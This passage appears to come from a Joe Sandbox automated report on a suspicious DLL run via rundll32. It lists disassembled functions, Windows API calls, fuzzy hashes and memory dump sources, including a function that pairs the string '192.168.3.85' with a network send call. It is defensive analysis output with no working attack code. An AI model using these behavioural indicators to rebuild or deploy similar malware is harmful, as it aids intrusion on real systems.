                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMenuWindow$AppendSystem
                                                                                                                    • String ID: 192.168.3.85$Message
                                                                                                                    • API String ID: 4121476972-856608562
                                                                                                                    • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                    • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                    • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                    • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                    • _strcat.LIBCMT ref: 1001310A
                                                                                                                      • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 16450322-3653984579
                                                                                                                    • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                    • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                    • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                    • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                      • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                    • API String ID: 3274081130-63838506
                                                                                                                    • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                    • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                    • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                    • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                    • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                    • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                    • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                    • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                    • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                    • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                    • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2459298410-0
                                                                                                                    • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                    • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                    • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                    • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 365290523-0
                                                                                                                    • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                    • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                    • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                    • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$DesktopVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1055025324-0
                                                                                                                    • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                    • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                    • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                    • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 1002C6E7
                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                    • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 26245289-0
                                                                                                                    • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                    • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                    • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                    • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                    • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                    • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                    • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                    • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                    • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                    • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetDC.USER32(?), ref: 1002658E
                                                                                                                    • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3511876931-0
                                                                                                                    • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                    • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                    • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                    • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __msize_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1288803200-0
                                                                                                                    • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                    • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                    • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                    • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePeek$H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3998274959-0
                                                                                                                    • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                    • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                    • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                    • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                      • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                      • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                    • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
